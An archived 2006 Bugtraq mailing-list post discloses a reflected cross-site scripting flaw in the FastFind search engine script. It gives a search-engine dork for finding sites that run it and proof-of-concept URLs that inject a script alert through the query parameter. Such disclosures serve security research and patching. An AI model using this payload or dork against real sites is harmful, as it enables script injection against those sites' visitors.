| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061007165602.4982.qmail@securityfocus.com> Date: 7 Oct 2006 16:56:02 -0000 From: Dr.Ninux@...mail.com To: bugtraq@...urityfocus.com Subject: Sorry....My Message With Out Live Site.... XSS IN FastFind... DORK: "Powered by FastFind - Search Engine Script" Exploit: http://[target]/[path]/index.php?query=<script>alert(1)</script>&type=simple references: http://www.interspire.com/fastfind/ Example: http://www.target.com/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple http://www.target.com/search/index.php?query=<script>alert(1)</script>&type=simple
Powered by blists - more mailing lists